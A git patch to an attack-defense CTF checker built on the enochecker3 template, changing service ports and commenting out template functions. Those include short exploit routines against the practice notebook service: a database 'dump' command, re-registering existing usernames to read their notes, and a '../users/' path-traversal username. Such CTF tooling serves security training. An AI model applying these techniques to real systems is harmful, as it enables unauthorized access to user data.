From 5277270e827418d0fb90bcfa411603c3fcb15806 Mon Sep 17 00:00:00 2001 From: SirGankalot <73303677+SirGankalot@users.noreply.github.com> Date: Mon, 13 May 2024 15:25:36 +0200 Subject: [PATCH] getting to know the checker and tester --- checker3/src/checker.py | 554 ++++++++++++++++++++----------------- service/Dockerfile | 2 +- service/docker-compose.yml | 2 +- 3 files changed, 309 insertions(+), 249 deletions(-) diff --git a/checker3/src/checker.py b/checker3/src/checker.py index 0fe0097..666eb77 100644 --- a/checker3/src/checker.py +++ b/checker3/src/checker.py @@ -2,7 +2,7 @@ import asyncio import random import string -import faker +#import faker from typing import Optional @@ -13,29 +13,28 @@ Enochecker, ExploitCheckerTaskMessage, FlagSearcher, - BaseCheckerTaskMessage, + #BaseCheckerTaskMessage, PutflagCheckerTaskMessage, GetflagCheckerTaskMessage, PutnoiseCheckerTaskMessage, GetnoiseCheckerTaskMessage, HavocCheckerTaskMessage, MumbleException, - OfflineException, - InternalErrorException, + #OfflineException, + #InternalErrorException, PutflagCheckerTaskMessage, AsyncSocket, ) -from enochecker3.utils import assert_equals, assert_in +from enochecker3.utils import FlagSearcher, assert_equals, assert_in """ Checker config """ -SERVICE_PORT = 2323 -checker = Enochecker("n0t3b00k", SERVICE_PORT) +SERVICE_PORT = 5050 +checker = Enochecker("whatsscam_service", SERVICE_PORT) app = lambda: checker.app - """ Utility functions """ @@ -74,88 +73,6 @@ def _get_connection(socket: AsyncSocket, logger: LoggerAdapter) -> Connection: CHECKER FUNCTIONS """ -@checker.putflag(0) -async def putflag_note( - task: PutflagCheckerTaskMessage, - db: ChainDB, - conn: Connection, - logger: LoggerAdapter, -) -> None: - # First we need to register a user. So let's create some random strings. (Your real checker should use some funny usernames or so) - username: str = "".join( - random.choices(string.ascii_uppercase + string.digits, k=12) - ) - password: str = "".join( - random.choices(string.ascii_uppercase + string.digits, k=12) - ) - - # Log a message before any critical action that could raise an error. - logger.debug(f"Connecting to service") - welcome = await conn.reader.readuntil(b">") - - # Register a new user - await conn.register_user(username, password) - - # Now we need to login - await conn.login_user(username, password) - - # Finally, we can post our note! - logger.debug(f"Sending command to set the flag") - conn.writer.write(f"set {task.flag}\n".encode()) - await conn.writer.drain() - await conn.reader.readuntil(b"Note saved! ID is ") - - try: - # Try to retrieve the resulting noteId. Using rstrip() is hacky, you should probably want to use regular expressions or something more robust. - noteId = (await conn.reader.readuntil(b"!\n>")).rstrip(b"!\n>").decode() - except Exception as ex: - logger.debug(f"Failed to retrieve note: {ex}") - raise MumbleException("Could not retrieve NoteId") - - assert_equals(len(noteId) > 0, True, message="Empty noteId received") - - logger.debug(f"Got noteId {noteId}") - - # Exit! - logger.debug(f"Sending exit command") - conn.writer.write(f"exit\n".encode()) - await conn.writer.drain() - - # Save the generated values for the associated getflag() call. - await db.set("userdata", (username, password, noteId)) - - return username - -@checker.getflag(0) -async def getflag_note( - task: GetflagCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection -) -> None: - try: - username, password, noteId = await db.get("userdata") - except KeyError: - raise MumbleException("Missing database entry from putflag") - - logger.debug(f"Connecting to the service") - await conn.reader.readuntil(b">") - - # Let's login to the service - await conn.login_user(username, password) - - # Let´s obtain our note. - logger.debug(f"Sending command to retrieve note: {noteId}") - conn.writer.write(f"get {noteId}\n".encode()) - await conn.writer.drain() - note = await conn.reader.readuntil(b">") - assert_in( - task.flag.encode(), note, "Resulting flag was found to be incorrect" - ) - - # Exit! - logger.debug(f"Sending exit command") - conn.writer.write(f"exit\n".encode()) - await conn.writer.drain() - - @checker.putnoise(0) async def putnoise0(task: PutnoiseCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection): logger.debug(f"Connecting to the service") @@ -200,188 +117,331 @@ async def putnoise0(task: PutnoiseCheckerTaskMessage, db: ChainDB, logger: Logge await conn.writer.drain() await db.set("userdata", (username, password, noteId, randomNote)) - -@checker.getnoise(0) -async def getnoise0(task: GetnoiseCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection): - try: - (username, password, noteId, randomNote) = await db.get('userdata') - except: - raise MumbleException("Putnoise Failed!") - logger.debug(f"Connecting to service") - welcome = await conn.reader.readuntil(b">") - # Let's login to the service - await conn.login_user(username, password) - # Let´s obtain our note. - logger.debug(f"Sending command to retrieve note: {noteId}") - conn.writer.write(f"get {noteId}\n".encode()) - await conn.writer.drain() - data = await conn.reader.readuntil(b">") - if not randomNote.encode() in data: - raise MumbleException("Resulting flag was found to be incorrect") - # Exit! - logger.debug(f"Sending exit command") - conn.writer.write(f"exit\n".encode()) - await conn.writer.drain() -@checker.havoc(0) -async def havoc0(task: HavocCheckerTaskMessage, logger: LoggerAdapter, conn: Connection): - logger.debug(f"Connecting to service") - welcome = await conn.reader.readuntil(b">") - # In variant 0, we'll check if the help text is available - logger.debug(f"Sending help command") - conn.writer.write(f"help\n".encode()) - await conn.writer.drain() - helpstr = await conn.reader.readuntil(b">") - - for line in [ - "This is a notebook service. Commands:", - "reg USER PW - Register new account", - "log USER PW - Login to account", - "set TEXT..... - Set a note", - "user - List all users", - "list - List all notes", - "exit - Exit!", - "dump - Dump the database", - "get ID", - ]: - assert_in(line.encode(), helpstr, "Received incomplete response.") - -@checker.havoc(1) -async def havoc1(task: HavocCheckerTaskMessage, logger: LoggerAdapter, conn: Connection): - logger.debug(f"Connecting to service") - welcome = await conn.reader.readuntil(b">") - # In variant 1, we'll check if the `user` command still works. - username = "".join( - random.choices(string.ascii_uppercase + string.digits, k=12) - ) - password = "".join( - random.choices(string.ascii_uppercase + string.digits, k=12) - ) - # Register and login a dummy user - await conn.register_user(username, password) - await conn.login_user(username, password) - logger.debug(f"Sending user command") - conn.writer.write(f"user\n".encode()) - await conn.writer.drain() - ret = await conn.reader.readuntil(b">") - if not b"User 0: " in ret: - raise MumbleException("User command does not return any users") - if username: - assert_in(username.encode(), ret, "Flag username not in user output") - # conn.writer.close() - # await conn.writer.wait_closed() -@checker.havoc(2) -async def havoc2(task: HavocCheckerTaskMessage, logger: LoggerAdapter, conn: Connection): - logger.debug(f"Connecting to service") - welcome = await conn.reader.readuntil(b">") - # In variant 2, we'll check if the `list` command still works. - username = "".join( - random.choices(string.ascii_uppercase + string.digits, k=12) - ) - password = "".join( - random.choices(string.ascii_uppercase + string.digits, k=12) - ) - randomNote = "".join( - random.choices(string.ascii_uppercase + string.digits, k=36) - ) - # Register and login a dummy user - await conn.register_user(username, password) - await conn.login_user(username, password) - logger.debug(f"Sending command to save a note") - conn.writer.write(f"set {randomNote}\n".encode()) - await conn.writer.drain() - await conn.reader.readuntil(b"Note saved! ID is ") - try: - noteId = (await conn.reader.readuntil(b"!\n>")).rstrip(b"!\n>").decode() - except Exception as ex: - logger.debug(f"Failed to retrieve note: {ex}") - raise MumbleException("Could not retrieve NoteId") +# @checker.putflag(0) +# async def putflag_note( +# task: PutflagCheckerTaskMessage, +# db: ChainDB, +# conn: Connection, +# logger: LoggerAdapter, +# ) -> None: +# # First we need to register a user. So let's create some random strings. (Your real checker should use some funny usernames or so) +# username: str = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) +# password: str = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) - assert_equals(len(noteId) > 0, True, message="Empty noteId received") +# # Log a message before any critical action that could raise an error. +# logger.debug(f"Connecting to service") +# welcome = await conn.reader.readuntil(b">") - logger.debug(f"{noteId}") +# # Register a new user +# await conn.register_user(username, password) - logger.debug(f"Sending list command") - conn.writer.write(f"list\n".encode()) - await conn.writer.drain() +# # Now we need to login +# await conn.login_user(username, password) - data = await conn.reader.readuntil(b">") - if not noteId.encode() in data: - raise MumbleException("List command does not work as intended") +# # Finally, we can post our note! +# logger.debug(f"Sending command to set the flag") +# conn.writer.write(f"set {task.flag}\n".encode()) +# await conn.writer.drain() +# await conn.reader.readuntil(b"Note saved! ID is ") -@checker.exploit(0) -async def exploit0(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger:LoggerAdapter) -> Optional[str]: - welcome = await conn.reader.readuntil(b">") - conn.writer.write(b"dump\nexit\n") - await conn.writer.drain() - data = await conn.reader.read(-1) - if flag := searcher.search_flag(data): - return flag - raise MumbleException("flag not found") +# try: +# # Try to retrieve the resulting noteId. Using rstrip() is hacky, you should probably want to use regular expressions or something more robust. +# noteId = (await conn.reader.readuntil(b"!\n>")).rstrip(b"!\n>").decode() +# except Exception as ex: +# logger.debug(f"Failed to retrieve note: {ex}") +# raise MumbleException("Could not retrieve NoteId") -@checker.exploit(1) -async def exploit1(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger:LoggerAdapter) -> Optional[str]: - welcome = await conn.reader.readuntil(b">") - conn.writer.write(b"user\n") - await conn.writer.drain() +# assert_equals(len(noteId) > 0, True, message="Empty noteId received") - # TODO: Use flag hints - user_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] - for user in user_list: - user_name = user.split()[-1] - conn.writer.write(b"reg %s foo\nlog %s foo\n list\n" % (user_name, user_name)) - await conn.writer.drain() - await conn.reader.readuntil(b">") # successfully registered - await conn.reader.readuntil(b">") # successfully logged in - notes_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] - for note in notes_list: - note_id = note.split()[-1] - conn.writer.write(b"get %s\n" % note_id) - await conn.writer.drain() - data = await conn.reader.readuntil(b">") - if flag := searcher.search_flag(data): - return flag - raise MumbleException("flag not found") - -@checker.exploit(2) -async def exploit2(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger:LoggerAdapter) -> Optional[str]: - welcome = await conn.reader.readuntil(b">") - conn.writer.write(b"user\n") - await conn.writer.drain() +# logger.debug(f"Got noteId {noteId}") + +# # Exit! +# logger.debug(f"Sending exit command") +# conn.writer.write(f"exit\n".encode()) +# await conn.writer.drain() + +# # Save the generated values for the associated getflag() call. +# await db.set("userdata", (username, password, noteId)) + +# return username + +# @checker.getflag(0) +# async def getflag_note( +# task: GetflagCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection +# ) -> None: +# try: +# username, password, noteId = await db.get("userdata") +# except KeyError: +# raise MumbleException("Missing database entry from putflag") + +# logger.debug(f"Connecting to the service") +# await conn.reader.readuntil(b">") + +# # Let's login to the service +# await conn.login_user(username, password) + +# # Let´s obtain our note. +# logger.debug(f"Sending command to retrieve note: {noteId}") +# conn.writer.write(f"get {noteId}\n".encode()) +# await conn.writer.drain() +# note = await conn.reader.readuntil(b">") +# assert_in( +# task.flag.encode(), note, "Resulting flag was found to be incorrect" +# ) + +# # Exit! +# logger.debug(f"Sending exit command") +# conn.writer.write(f"exit\n".encode()) +# await conn.writer.drain() + - # TODO: Use flag hints? - user_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] - for user in user_list: - user_name = user.split()[-1] - conn.writer.write(b"reg ../users/%s foo\nlog %s foo\n list\n" % (user_name, user_name)) - await conn.writer.drain() - await conn.reader.readuntil(b">") # successfully registered - await conn.reader.readuntil(b">") # successfully logged in - notes_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] - for note in notes_list: - note_id = note.split()[-1] - conn.writer.write(b"get %s\n" % note_id) - await conn.writer.drain() - data = await conn.reader.readuntil(b">") - if flag := searcher.search_flag(data): - return flag - raise MumbleException("flag not found") +# @checker.putnoise(0) +# async def putnoise0(task: PutnoiseCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection): +# logger.debug(f"Connecting to the service") +# welcome = await conn.reader.readuntil(b">") + +# # First we need to register a user. So let's create some random strings. (Your real checker should use some better usernames or so [i.e., use the "faker¨ lib]) +# username = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) +# password = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) +# randomNote = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=36) +# ) + +# # Register another user +# await conn.register_user(username, password) + +# # Now we need to login +# await conn.login_user(username, password) + +# # Finally, we can post our note! +# logger.debug(f"Sending command to save a note") +# conn.writer.write(f"set {randomNote}\n".encode()) +# await conn.writer.drain() +# await conn.reader.readuntil(b"Note saved! ID is ") + +# try: +# noteId = (await conn.reader.readuntil(b"!\n>")).rstrip(b"!\n>").decode() +# except Exception as ex: +# logger.debug(f"Failed to retrieve note: {ex}") +# raise MumbleException("Could not retrieve NoteId") + +# assert_equals(len(noteId) > 0, True, message="Empty noteId received") + +# logger.debug(f"{noteId}") + +# # Exit! +# logger.debug(f"Sending exit command") +# conn.writer.write(f"exit\n".encode()) +# await conn.writer.drain() + +# await db.set("userdata", (username, password, noteId, randomNote)) + +# @checker.getnoise(0) +# async def getnoise0(task: GetnoiseCheckerTaskMessage, db: ChainDB, logger: LoggerAdapter, conn: Connection): +# try: +# (username, password, noteId, randomNote) = await db.get('userdata') +# except: +# raise MumbleException("Putnoise Failed!") + +# logger.debug(f"Connecting to service") +# welcome = await conn.reader.readuntil(b">") + +# # Let's login to the service +# await conn.login_user(username, password) + +# # Let´s obtain our note. +# logger.debug(f"Sending command to retrieve note: {noteId}") +# conn.writer.write(f"get {noteId}\n".encode()) +# await conn.writer.drain() +# data = await conn.reader.readuntil(b">") +# if not randomNote.encode() in data: +# raise MumbleException("Resulting flag was found to be incorrect") + +# # Exit! +# logger.debug(f"Sending exit command") +# conn.writer.write(f"exit\n".encode()) +# await conn.writer.drain() + + +# @checker.havoc(0) +# async def havoc0(task: HavocCheckerTaskMessage, logger: LoggerAdapter, conn: Connection): +# logger.debug(f"Connecting to service") +# welcome = await conn.reader.readuntil(b">") + +# # In variant 0, we'll check if the help text is available +# logger.debug(f"Sending help command") +# conn.writer.write(f"help\n".encode()) +# await conn.writer.drain() +# helpstr = await conn.reader.readuntil(b">") + +# for line in [ +# "This is a notebook service. Commands:", +# "reg USER PW - Register new account", +# "log USER PW - Login to account", +# "set TEXT..... - Set a note", +# "user - List all users", +# "list - List all notes", +# "exit - Exit!", +# "dump - Dump the database", +# "get ID", +# ]: +# assert_in(line.encode(), helpstr, "Received incomplete response.") + +# @checker.havoc(1) +# async def havoc1(task: HavocCheckerTaskMessage, logger: LoggerAdapter, conn: Connection): +# logger.debug(f"Connecting to service") +# welcome = await conn.reader.readuntil(b">") + +# # In variant 1, we'll check if the `user` command still works. +# username = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) +# password = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) + +# # Register and login a dummy user +# await conn.register_user(username, password) +# await conn.login_user(username, password) + +# logger.debug(f"Sending user command") +# conn.writer.write(f"user\n".encode()) +# await conn.writer.drain() +# ret = await conn.reader.readuntil(b">") +# if not b"User 0: " in ret: +# raise MumbleException("User command does not return any users") + +# if username: +# assert_in(username.encode(), ret, "Flag username not in user output") + +# # conn.writer.close() +# # await conn.writer.wait_closed() + +# @checker.havoc(2) +# async def havoc2(task: HavocCheckerTaskMessage, logger: LoggerAdapter, conn: Connection): +# logger.debug(f"Connecting to service") +# welcome = await conn.reader.readuntil(b">") + +# # In variant 2, we'll check if the `list` command still works. +# username = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) +# password = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=12) +# ) +# randomNote = "".join( +# random.choices(string.ascii_uppercase + string.digits, k=36) +# ) + +# # Register and login a dummy user +# await conn.register_user(username, password) +# await conn.login_user(username, password) + +# logger.debug(f"Sending command to save a note") +# conn.writer.write(f"set {randomNote}\n".encode()) +# await conn.writer.drain() +# await conn.reader.readuntil(b"Note saved! ID is ") + +# try: +# noteId = (await conn.reader.readuntil(b"!\n>")).rstrip(b"!\n>").decode() +# except Exception as ex: +# logger.debug(f"Failed to retrieve note: {ex}") +# raise MumbleException("Could not retrieve NoteId") + +# assert_equals(len(noteId) > 0, True, message="Empty noteId received") + +# logger.debug(f"{noteId}") + +# logger.debug(f"Sending list command") +# conn.writer.write(f"list\n".encode()) +# await conn.writer.drain() + +# data = await conn.reader.readuntil(b">") +# if not noteId.encode() in data: +# raise MumbleException("List command does not work as intended") + +# @checker.exploit(0) +# async def exploit0(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger:LoggerAdapter) -> Optional[str]: +# welcome = await conn.reader.readuntil(b">") +# conn.writer.write(b"dump\nexit\n") +# await conn.writer.drain() +# data = await conn.reader.read(-1) +# if flag := searcher.search_flag(data): +# return flag +# raise MumbleException("flag not found") + +# @checker.exploit(1) +# async def exploit1(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger:LoggerAdapter) -> Optional[str]: +# welcome = await conn.reader.readuntil(b">") +# conn.writer.write(b"user\n") +# await conn.writer.drain() + +# # TODO: Use flag hints +# user_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] +# for user in user_list: +# user_name = user.split()[-1] +# conn.writer.write(b"reg %s foo\nlog %s foo\n list\n" % (user_name, user_name)) +# await conn.writer.drain() +# await conn.reader.readuntil(b">") # successfully registered +# await conn.reader.readuntil(b">") # successfully logged in +# notes_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] +# for note in notes_list: +# note_id = note.split()[-1] +# conn.writer.write(b"get %s\n" % note_id) +# await conn.writer.drain() +# data = await conn.reader.readuntil(b">") +# if flag := searcher.search_flag(data): +# return flag +# raise MumbleException("flag not found") + +# @checker.exploit(2) +# async def exploit2(task: ExploitCheckerTaskMessage, searcher: FlagSearcher, conn: Connection, logger:LoggerAdapter) -> Optional[str]: +# welcome = await conn.reader.readuntil(b">") +# conn.writer.write(b"user\n") +# await conn.writer.drain() + +# # TODO: Use flag hints? +# user_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] +# for user in user_list: +# user_name = user.split()[-1] +# conn.writer.write(b"reg ../users/%s foo\nlog %s foo\n list\n" % (user_name, user_name)) +# await conn.writer.drain() +# await conn.reader.readuntil(b">") # successfully registered +# await conn.reader.readuntil(b">") # successfully logged in +# notes_list = (await conn.reader.readuntil(b">")).split(b"\n")[:-1] +# for note in notes_list: +# note_id = note.split()[-1] +# conn.writer.write(b"get %s\n" % note_id) +# await conn.writer.drain() +# data = await conn.reader.readuntil(b">") +# if flag := searcher.search_flag(data): +# return flag +# raise MumbleException("flag not found") if __name__ == "__main__": diff --git a/service/Dockerfile b/service/Dockerfile index 5bb47f6..f576f60 100644 --- a/service/Dockerfile +++ b/service/Dockerfile @@ -7,4 +7,4 @@ COPY main.py / RUN pip install -r src/requirements.txt -CMD gunicorn --bind 0.0.0.0:5000 main:app +CMD gunicorn --bind 0.0.0.0:5050 main:app diff --git a/service/docker-compose.yml b/service/docker-compose.yml index c1565a5..0865467 100644 --- a/service/docker-compose.yml +++ b/service/docker-compose.yml @@ -6,4 +6,4 @@ services: - ./instance:/instance # change port later ports: - - "5000:5000" + - "5050:5050"